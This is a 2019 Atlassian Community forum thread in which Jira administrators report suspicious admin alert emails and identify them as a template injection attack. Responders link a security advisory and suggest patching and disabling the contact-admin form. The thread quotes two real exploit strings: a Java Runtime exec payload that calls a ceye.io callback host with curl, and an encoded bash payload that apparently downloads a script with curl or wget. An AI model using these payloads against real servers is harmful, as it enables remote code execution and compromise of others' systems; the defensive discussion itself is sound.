Forums
Home Product Q&A Discussion groups Articles Ask a question Search
Learning
Events
Champions

Forums

Articles
Create
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
Product Q&A
See all
Community resources
Top groups
Explore all groups
Community resources
Learn
Community resources
Events
Community resources

JIRA Admin Alert - $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke

Mike Markellos
Mike Markellos
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
July 16, 2019

I received this alert twice within a 2 hour period.  Has anybody else received an error like this?  

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://32te8o.ceye.io/`whoami`').waitFor()

Answer
Watch
Like Be the first to like this
3236 views

2 answers

1 accepted

0 votes
Answer accepted
joykevin0110
joykevin0110
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
July 16, 2019

I received same alert.
I think, code injection attack.
Don't connect the 'http://32te8o.ceye.io' url.

View More Comments
Mike Markellos
Mike Markellos
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
July 18, 2019

Thanks - it does look suspicious.  Doesn't look like many other have seen this attack yet?

Like
joykevin0110
joykevin0110
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
July 19, 2019

https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

I think, this problem is same the link.
we need a patch the jira-software.

Like
Vincent Clerc
Vincent Clerc
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
August 16, 2019

Same attack received on our side

Like
Reto Kämpfer
Reto Kämpfer August 16, 2019

I see a very similar attack on our server. Is there any way to block theses messages?

The Subject of the message begins like this:

[JIRA] $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -c {echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovL3AuNjQ2NTczNzQ3Mjc1NjM3NDY5NmY2ZS5pY3U6ODA4MC9qaXJhXzEgLW8gL3RtcC9jcm9ufHx3Z2V0IC1xIC1UMTgwIGh0dHA6...

Like
Reply
1 vote
Udhaya Prakash
Udhaya Prakash
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
Get involved
August 29, 2019

Its a template injection attack, where the freemarker template from contact admin fields are placed unsafely in the email template. So whoever received it, there serves already comprised by executing the exec() function and get a call back to the attacker server. to mitigate thses, disable the contact admin page in your system setting is jira admin and update it if possible

Reply

Suggest an answer

Log in or Sign up to answer
Jira
Jira
TAGS
AUG Leaders

Atlassian Community Events

    See all events
    Community
    Forums
    FAQs Forums guidelines
    Learning
    About learning Resources
    Events
    Champions
    Copyright © 2025 Atlassian
    Privacy Policy Notice at Collection Terms Security
    Welcome illustration

    Welcome to the new Atlassian Community

    Online forums and learning are now in one easy-to-use experience.

    By continuing, you accept the updated Community Terms of Use and acknowledge the Privacy Policy. Your public name, photo, and achievements may be publicly visible and available in search engines.